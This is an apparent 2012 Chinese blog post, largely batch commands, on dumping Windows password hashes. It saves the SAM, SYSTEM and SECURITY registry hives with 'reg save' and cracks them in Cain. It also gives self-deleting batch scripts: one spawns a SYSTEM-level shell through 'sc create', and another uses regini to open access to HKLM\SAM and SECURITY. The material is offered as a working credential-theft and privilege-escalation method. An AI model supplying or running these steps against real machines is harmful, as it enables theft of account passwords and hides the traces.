匯出系統登錄檔抓Hash的思路整理

fengling132發表於2012-05-02
首先使用 administrator許可權登入,然後使用 reg來儲存登錄檔中 HKLM下的 SECURITY,SAM,SYSTEM,注意這裡必須使用 reg的 save選項,export選項是不行的,
reg save hklm\sam sam.hive 
reg save hklm\system ystem.hive 
reg save hklm\security security.hive 

然後把 sam.hive,system.hive,security.hive下載回本地,開啟 CAIN,在"Decoders"標籤下,點"LSA Secrets", 點"+"來匯入 system.hive和 security.hive. 
==============================
要破解 LM/NTLM hash,首先點"cracker"標籤下的"LM&NTLM hashes",然後點"+",匯入 sam.hive,注意由於現在的 win2000以後都預設使用了 syskey,所以還要匯入 system.hive中的 syskey的值,然後就可以彩虹表破解了。
==============================
1、以下是TheLostMind的思路

         對使用者許可權要求,預設XP SP3是匯出不了的,我本地測試了,但是system許可權是可以的,那麼我們可以建立一個system許可權執行的CMD,然後再匯出就OK了。
其他系統上面沒測試過,大家自己整吧。
首先建立一個系統許可權執行的CMD:
======================StartSystemCmd.bat=========
sc Create systemcmd binPath= "cmd /K start" type= own type= interact
sc start systemcmd
sc delete systemcmd
del %0
=======================END=========================
然後匯出檔案。
==================SaveReg.bat=======================
@echo off
reg save hklm\sam sam.hive
reg save hklm\system system.hive 
reg save hklm\security security.hive
del %0
=====================END============================
然後倒入到CAIN裡面破吧。

2、我的思路

有時我們不方便再跳出一個CMD,這時可以利用命令regini.exe修改登錄檔的訪問許可權。
首先新建一個文字檔案pri.ini,內容如下:
===========pri.ini===================
HKEY_LOCAL_MACHINE\SECURITY [1 17]
HKEY_LOCAL_MACHINE\SAM [1 17]
===================================
然後執行 regini.exe pri.ini 

寫成批處理的內容如下:
================================
echo HKEY_LOCAL_MACHINE\SECURITY [1 17]>pri.ini
echo HKEY_LOCAL_MACHINE\SAM [1 17]>>pri.ini
regini.exe pri.ini
del pri.ini
================================
注:以上操作是將hklm\security與hklm\sam賦予Administrators和System完全訪問的許可權。hklm\system一般對管理員是放開訪問的,可視情況修改。以上兩個表項對系統登陸至關重要,請謹慎修改。

最後就可以直接利用reg匯出登錄檔內容。

相關文章